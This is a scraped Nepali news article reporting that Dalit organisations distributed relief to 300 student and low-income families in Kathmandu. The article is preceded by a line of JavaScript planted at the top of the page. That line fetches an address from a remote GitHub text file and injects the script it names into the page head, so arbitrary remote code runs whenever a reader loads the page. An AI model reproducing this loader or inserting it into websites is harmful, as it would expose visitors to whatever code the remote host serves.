;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाल दलित संघ र नेपाल दलित बिधार्थी संघको संयुक्त आयोजनामा ३०० परिवारलाई राहात वितरण – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपाल दलित संघ र नेपाल दलित बिधार्थी संघको संयुक्त आयोजनामा ३०० परिवारलाई राहात वितरण
जुनेली बिशेष

नेपाल दलित संघ र नेपाल दलित बिधार्थी संघको संयुक्त आयोजनामा ३०० परिवारलाई राहात वितरण

बैशाख १२ ,

काठमाडौँ |  टेगार फाउन्डेसन अफ नेपालको प्रमुख सहयोगमा साथै नेपाल दलित संघ केन्द्रीय समिति र नेपाल दलित विद्यार्थी संघ केन्द्रीय समितिको संयुक्त आयोजनामा मिति:२०७७/०१/११ गते बाहिर जिल्लाबाट काठमाण्डौंमा अध्ययन गर्न आएका दलित विद्यार्थीहरूलाई र दलित समुदायका मजदुर तथा विपन्नहरु ३०० वटा परिवारलाई राहत वितरण गरेको छ ।

 

विशेष भूमिका: माननीय मीन विश्वकर्मा ज्यू, आदरणीय हरिशरण नेपाली ज्यू, आदरणीय दीपक सोनी ज्यू, आदरणीय शेरब बहादुर तामाङ ज्यू, टेक बहदुर वि.क ज्यू, सुवास बराईली ज्यू र सहयोगी अरु सम्पूर्णलाई नेपाल दलित बिधार्थी संघका अध्यक्ष राजु सुनारले हार्दिक धन्यवाद व्यक्त गरेका छ |। “समाज सेवा त राष्ट्र सेवा” जय नेपाल ! जय मानव !!!

फेसबुक प्रतिक्रियाहरु